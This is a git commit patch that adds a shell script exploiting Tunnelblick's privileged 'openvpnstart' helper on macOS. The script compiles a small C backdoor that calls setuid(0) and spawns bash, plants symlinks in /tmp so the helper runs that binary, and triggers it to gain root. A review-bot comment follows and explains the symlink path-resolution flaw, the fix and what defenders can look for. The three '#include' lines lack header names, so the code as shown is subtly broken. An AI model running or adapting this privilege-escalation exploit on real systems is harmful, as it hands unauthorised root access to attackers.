From 059cdebb2d51944881dd24e862f9e40b249ee0a6 Mon Sep 17 00:00:00 2001
From: "Jason A. Donenfeld"
Date: Sat, 11 Aug 2012 17:00:56 +0200
Subject: An easy shell script.

---
pwnnel-blicker-for-kids.sh | 28 ++++++++++++++++++++++++++++
1 file changed, 28 insertions(+)
create mode 100755 pwnnel-blicker-for-kids.sh

diff --git a/pwnnel-blicker-for-kids.sh b/pwnnel-blicker-for-kids.sh
new file mode 100755
index 0000000..bc1a336
--- /dev/null
+++ b/pwnnel-blicker-for-kids.sh
@@ -0,0 +1,28 @@
+#!/bin/sh
+echo "[+] Making vulnerable directory."
+mkdir -pv /tmp/pwn/openvpn/openvpn-0
+
+echo "[+] Preparing payload."
+cat > /tmp/pwn/backdoor.c <<_EOF
+#include
+#include
+#include
+
+int main()
+{
+ printf("[+] Cleaning up.\n");
+ system("rm -rfv /tmp/pwn");
+ printf("[+] Getting root.\n");
+ setuid(0);
+ setgid(0);
+ execl("/bin/bash", "bash", NULL);
+}
+_EOF
+gcc -o /tmp/pwn/root /tmp/pwn/backdoor.c
+
+echo "[+] Creating symlinks."
+ln -s -v -f /tmp/pwn/root /tmp/pwn/openvpn/openvpn-0/openvpn
+ln -s -v -f /Applications/Tunnelblick.app/Contents/Resources/openvpnstart /tmp/pwn/start
+
+echo "[+] Triggering vulnerable program."
+exec /tmp/pwn/start OpenVPNInfo 0
--
cgit v1.2.3-59-g8ed1b
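Review bot: The new script has no header comment saying which flaw it demonstrates, so the root cause has to be inferred from the two `ln -s` lines and the final `exec`. From those lines it appears that `openvpnstart` runs with elevated privileges and locates `openvpn/openvpn-0/openvpn` relative to the path it was invoked through, so a symlink in a user-writable directory decides which binary it executes. I would add directly under the shebang `# PoC: openvpnstart resolves ./openvpn/openvpn-<n>/openvpn relative to its invoked path and runs it privileged` and `# Affected release: <affected Tunnelblick version>; fix: helper must resolve its real path and exec only root-owned binaries in a non-writable tree`. That also gives defenders the thing to look for, namely the helper being started through a symlink outside the application bundle. The three `#include` lines show no header names in this rendering, which looks like an extraction artefact rather than the committed content.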